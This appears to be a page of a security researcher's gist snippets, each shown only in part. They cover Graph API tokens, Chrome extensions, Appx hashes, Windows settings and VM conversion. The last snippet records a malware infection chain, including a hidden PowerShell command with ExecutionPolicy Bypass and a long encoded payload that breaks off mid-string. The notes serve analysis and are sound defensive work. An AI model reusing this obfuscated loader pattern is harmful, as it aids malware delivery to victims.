| import urllib.request | |
| import urllib.parse | |
| import urllib.error | |
| def urlreq(method: str, url: str, headers: dict = {}, data: dict | None = None) -> str: | |
| encoded_data = None | |
| if data is not None: | |
| if method == "GET": | |
| # urlencode data as path parameters | |
| params = "&".join( |
| import requests | |
| import sys | |
| import json | |
| MS_GRAPH_API_BASE_URL = "https://graph.microsoft.com" | |
| if __name__ == "__main__": | |
| if sys.stdin is not None: | |
| access_token = sys.stdin.readline().rstrip() |
| #!/bin/bash | |
| cat '/Users/<username>/Library/Application Support/Google/Chrome/Default/Extensions/'*/*/manifest.json | jq -r '.name' | grep -v __MSG |
Scenario: You only have the AppxBlockMap.xml from a potentially malicious Appx. You'd like to identify the original PE contained in the Appx.
AppxBlockMap.xml contains a list of files and their hashes contained in an Appx bundle. Each file is contained in a <File></File> xml
block. You can search for the string <File Name= to see each file or search directly for the relevant .exe. The file hash is the
last element (<b4:FileHash>) and is base64 encoded.
| #!/bin/bash | |
| # hacky one-liner to extract all hardcoded user agents from GraphRunner | |
| curl -s https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1 | grep '$UserAgent =' | grep -v 'Invoke' | awk '{ gsub(/\$UserAgent = /, ""); $1=$1; print }' | sed 's/"//g' | sed "s/'//g" |
| # Set Dark Mode | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name AppsUseLightTheme -Value 0 | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name SystemUsesLightTheme -Value 0 | |
| # Taskbar preferences | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarAl -Value 0 # Align Left | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarDa -Value 0 # Hide Widgets | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name TaskbarMn -Value 0 # Hide Chat | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced -Name ShowTaskViewButton -Value 0 # Hide TaskView | |
| Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Search -Name SearchBoxTaskbarMode -Value 0 # Hide SearchBox |
| #!/bin/bash | |
| tar xvf example.ova | |
| qemu-img convert -O qcow2 example.vmdk example.qcow2 |
wscript -> powershell -> .dll
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Uwgulbom.js"
"C:\Windows\System32\wscript.exe" "C:\Users\admin\Desktop\Uwgulbom.js" seroplasticGodchild bankweedPolycratic unmiserly becassockedUndividedness
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABjAGEAbAB1AG0AbgBpAGEAdABlAGQARgBvAG8AbABoAGEAcgBkAGkAZQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBkAEEAQgBvAEEARwA4AEEAYwBnAEIAdQBBAEMANABBAGIAZwBCAGgAQQBHAGMAQQBiAHcAQgA1AEEARwBFAEEAegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBQAEEASABVAEEAZABBAEIAbQBBAEcAawBBAFoAUQBCAHMAQQBHAFEAQQBaAFEAQgB5AEEASABNAEEATABnAEIAeQBBAEcAVQBBAGIAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQQA9AD0AegBUAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYgBBAEIANQBBAEcATQBBAGEAQQBCAGgAQQBHAFUAQQBkAEEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEgAYwBBAGIAdwBCAHkAQQBHAHcAQQBaAEEAQQA9ACIAOwAk